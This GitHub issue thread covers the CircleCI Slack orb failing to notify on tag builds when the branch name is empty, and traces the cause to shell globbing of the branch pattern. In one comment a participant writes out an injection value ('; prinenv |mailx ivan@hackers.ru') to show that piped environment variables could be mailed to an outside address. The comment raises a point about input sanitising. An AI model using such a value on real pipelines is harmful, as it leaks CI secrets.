### ISSUE TITLE
No notification is sent with empty branch name

### ISSUE THREAD

**Issue by limitusus** [CircleCI-Public/slack-orb#192]
## Orb version:

4.0.1

## What happened:

On tag push release, branch name is set empty; default regex pattern /.+/  does not match and no notification is sent.

Preparing environment variables

```
Using build environment variables:
  BASH_ENV=/tmp/.bash_env-5f872c9e54f5364a376525ef-0-build
  CI=true
  CIRCLECI=true
  CIRCLE_BRANCH=  # EMPTY HERE
  CIRCLE_BUILD_NUM=674
   ...
  CIRCLE_STAGE=release
  CIRCLE_TAG=v1.0.0
  ...
```

Final message

```
Checking For JQ + CURL: Debian
NO SLACK ALERT

Current branch does not match any item from the "branch_pattern" parameter
Current branch: 
CircleCI received exit code 0
```

## Expected behavior:

Notification should always be sent, even if branch is empty.
I believe the default `branch_pattern` should be `.*` instead of `.+`

## Additional Information:

https://github.com/CircleCI-Public/slack-orb/blob/v4.0.1/src/commands/notify.yml#L23-L27

**Comment by orangegrove1955** [comment]
Hi, I'm interested in taking up this issue, would that be alright?

**Comment by KyleTryon** [comment]
@orangegrove1955 👍 We'd love and appreciate the assistance. Please feel free to submit a PR

**Comment by frankgu968** [comment]
@orangegrove1955 @limitusus the `.*` branch pattern does not seem to work with an empty branch. 

I currently have the orb @ 4.0.1 set up to notify on successful tagged deployment, which is running on a tag rather than a branch. Using `.*` still results in the `Current branch does not match any item from the "branch_pattern" parameter
` error.

**Comment by frankgu968** [comment]
After a quick investigation, it seems like the issue is with the `BranchFilter()` function in the `notify` command. Specifically, the `$(echo "$SLACK_PARAM_BRANCHPATTERN" | sed "s/,/ /g")` line causes incorrect expansion of the `SLACK_PARAM_BRANCHPATTERN` variable when its value is `.*`; the bash shell seems to interpret that as all filenames in the current working directiory.

**Comment by klsetzer** [comment]
>when its value is `.*`; the bash shell seems to interpret that as all filenames in the current working directiory.

I'm sure others will chime in and mention shell globbing.  My question is, what happens if someone sets the branch pattern to:

`; prinenv |mailx ivan@hackers.ru`

I wonder how good a job this and other orbs do at sanitizing their inputs.

**Comment by gmemstr** [comment]
@klsetzer I would be curious how much of an issue this is for others - in my eyes, it isn't any riskier than anyone else making modifications to the `config.yml` file. There are a few ways to protect against this, like taking advantage of restricted contexts.

**Comment by metalrex100** [comment]
Is there a way to fix it with some branch filters as a temp solution?

**Comment by 73cn0109y** [comment]
I was able to get this working temporarily with the following: `branch_pattern: "[[:space:]]*"`

**Comment by KyleTryon** [comment]
> After a quick investigation, it seems like the issue is with the `BranchFilter()` function in the `notify` command. Specifically, the `$(echo "$SLACK_PARAM_BRANCHPATTERN" | sed "s/,/ /g")` line causes incorrect expansion of the `SLACK_PARAM_BRANCHPATTERN` variable when its value is `.*`; the bash shell seems to interpret that as all filenames in the current working directiory.

Thanks to @ark-1 in #199 I believe this may be resolved.
